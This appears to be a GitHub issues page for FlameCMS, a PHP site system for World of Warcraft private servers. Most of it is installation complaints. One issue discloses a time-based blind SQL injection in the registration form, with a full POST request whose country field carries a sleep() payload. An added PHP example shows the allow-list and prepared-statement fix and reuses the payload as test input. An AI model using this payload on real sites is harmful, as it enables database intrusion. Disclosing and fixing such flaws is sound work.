flamenet / flamecms

FlameCMS is a free template with working PHP OOP code. Easy 2 Setup & Friendly to use! With a Forum for World of Warcraft Private Servers. It's a Content Management System for all your needs with incredible support! (3.3.5a, 6.x.x)

Home Page: http://flamenet.github.io/FlameCMS

License: GNU General Public License v2.0

PHP 5.40% Makefile 0.01% HTML 49.29% Ruby 0.01% JavaScript 28.97% CSS 15.79% CoffeeScript 0.04% Shell 0.07% ActionScript 0.13% TSQL 0.19% Hack 0.09%

flamecms's Issues

Installation issue with MySQL and extens

First, when I click on next step in the second step, there is an error with the link, and there is no extension (thesite.com/install/step-3 and .PHP is not here)

Then, when I fill in the form, I obtain the errors that appear in the image.

Does someone know the solution?

[1] Base Template [0$]

This is a preview of how an issue is supposed to be placed!
Your title of the issue should be placed with a number (ex: [2]), a name (ex: [2] News not posting), a dollar number if you donate for the fix (ex: [2] News not posting [5$]) and a [BUG].
Then, for the main textarea you should state your problem specifically and provide an image so WE developers can understand and look to your problem easier.

IF

You are posting for an upgrade then you have to follow what is said before, BUT add [UPG] to the title
ex: [2] Shop System [10$] [UPG]

Thank you for reading my Base Template for posting an issue!
Sincerely,
Alex-FailZorD

Want to back this issue? Post a bounty on it! We accept bounties via Bountysource.

sql injection vulnerability (2)

Hello
There is a Time-based blind injection vulnerability here too:
FlameCMS-master/account/register.php

poc :
POST /FlameCMS-master/account/register?XDEBUG_SESSION_START=16052 HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 379
Connection: close
Referer: http://127.0.0.1:8888/FlameCMS-master/account/register?XDEBUG_SESSION_START=19560
Cookie: bdshare_firstime=1521359417238; _ga=GA1.1.1769867541.1569134195; mprtcl-v4_CCA8AE13={'gs':{'ie':1|'dt':'719f10ea1d9f664eab8238c61651c212'|'cgid':'319bce97-c8d8-46c5-8392-475ba6458c8a'|'das':'52a59f82-afe9-4f23-a231-edd8a11fc7d1'}|'l':0|'2092622027007090544':{'fst':1569134198283}|'cu':'2092622027007090544'}; PHPSESSID=dc9b176c866392458b9562d3ff8f6840; XDEBUG_SESSION=16052
Upgrade-Insecure-Requests: 1

csrftoken=6d42030c-2ad6-4fa2-b3be-0ba74e5aa7aa&country=CRItest',concat('test',(select sleep(if(length(user())>1,1,0)))),'333');#&ret=&sourceType=&dobMonth=1&dobDay=1&dobYear=2015&firstname=11111&lastname=11111&emailAddress=431%4011.com&emailAddressConfirmation=431%4011.com&password=11111&rePassword=11111&question1=19&answer1=bmw&agreedToChatPolicy=true&agreedToToU=true&submit

Time-based injection, and you need to write a new emailAddress every time to test
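
The report above points at the `country` field of the registration form. As an added example (not FlameCMS code and not from the reporter), this PHP block shows the two defences that close this class of bug: checking `country` against a closed list and binding every value as a statement parameter. The `accounts` table, its columns, the function names and the in-memory SQLite database are assumptions made so the block runs stand-alone.

```php
<?php
// Added example, not FlameCMS code. Table, columns and function names are
// hypothetical; in-memory SQLite stands in for the CMS's MySQL database.
declare(strict_types=1);

const ALLOWED_COUNTRIES = ['CRI', 'DEU', 'USA']; // constructed allow-list

// Values travel as bound parameters, so they are never parsed as SQL.
function insertAccount(PDO $db, string $country, string $first, string $email): bool
{
    $stmt = $db->prepare(
        'INSERT INTO accounts (country, first_name, email) VALUES (:c, :f, :e)'
    );
    return $stmt->execute([':c' => $country, ':f' => $first, ':e' => $email]);
}

// Reject anything outside the closed set before touching the database.
function registerAccount(PDO $db, array $post): bool
{
    $country = (string)($post['country'] ?? '');
    $email   = (string)($post['emailAddress'] ?? '');
    if (!in_array($country, ALLOWED_COUNTRIES, true)) {
        return false;
    }
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    return insertAccount($db, $country, (string)($post['firstname'] ?? ''), $email);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE accounts (country TEXT, first_name TEXT, email TEXT)');

// Constructed inputs: one normal value and the country value from the report.
$reported = "CRItest',concat('test',(select sleep(if(length(user())>1,1,0)))),'333');#";

var_dump(registerAccount($db, ['country' => 'DEU', 'firstname' => 'a', 'emailAddress' => 'a@example.com']));
var_dump(registerAccount($db, ['country' => $reported, 'firstname' => 'b', 'emailAddress' => 'b@example.com']));

// Even with validation skipped, binding stores the value as inert text.
var_dump(insertAccount($db, $reported, 'c', 'c@example.com'));
foreach ($db->query('SELECT country FROM accounts') as $row) {
    echo $row['country'], "\n";
}
```

On MySQL, also set `PDO::ATTR_EMULATE_PREPARES` to `false` so the driver uses server-side prepared statements.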

wrong country is stored in the database

I register with country Germany and enter my details.
The account is stored in the cms database as CRI (Costa Rica)!?

Will the bnetaccount in the auth database be created when the user sends back his activation code? I tested it by manually hitting the check button in the account table in the cms database, but nothing happens; only the account entry is made, but the user needs the bnetaccount entry to log in.

404 error

When I try to install the cms I click the install now button and I immediately get pushed to a 404 page at step 2.

Using IIS 8.0 on Windows Server 2012 r2, usually I have no problem with rewrite rules but this one has me scratching my head.

Also you have several:
Warning: Cannot modify header information - headers already sent by (output started at ROOT\wowserver\index.php:2)

You may need to check files for white spaces.

Installer can't connect to DB

Hey,
I just tried to install FlameCMS (6.x.x branch) but I always get the following error:
Failed to connect to MySQL: Access denied for user 'cms'@'localhost' (using password: YES)

I'm 100% sure that I'm using the correct password.
And the weird part is that if I try to connect to the DB with the cms user I can connect to it without any problems :/

CMS

Can this CMS be used for non WOW private servers? Or is it made specifically for WOW?

Updater

Before I try to install this, is there an update feature like the one in FusionCMS? Because I used that one for a bit but with small to no luck, because they seem to be working on a new one, obviously not caring about the previous version.

If not, it'd be cool to implement one, so maybe it will autoupdate with some zips :D

[2] First steps in installations [0$]

I have problems in the first step of the installation. When I have all successfully uploaded to the FTP server my site and subsequently entered the web address into the browser jumped me this error. I was wondering whether there is no need to change the attributes but if so I do not know to what

Warning: session_start(): Cannot send session cookie - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/config.php on line 28

Warning: session_start(): Cannot send session cache limiter - headers already sent (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/config.php on line 28

Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/core.php on line 28

Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/index.php:2) in /data/web/virtuals/44875/virtual/www/subdom/wotlkptr/system/core.php on line 111

[2] Installer Error [0$]

Can't install on another server.
But I configured a different host, not localhost. Any solutions how to fix it?

error code:
Trying to connect to database...
Failed to connect to MySQL: Access denied for user 'root'@'localhost' (using password: YES)

[3] Problems with installation

Well, during installation it gives me "ERR_TOO_MANY_REDIRECTS".
I tried disabling Cloudflare on my host, but no luck.

How can I fix that?

EDIT:
Ok, I managed to get this installed by manually editing my system/config.php file, but... nothing is working xD My login doesn't simply work, it says I "need to activate" my account.

Obviously there's a HUGE issue with url redirection, since every time I click on login it brings me to myurl.com/login/myurl.com/login/myurl.com/login and so on.

For now, it's not worth installing it, but it's an interesting project!

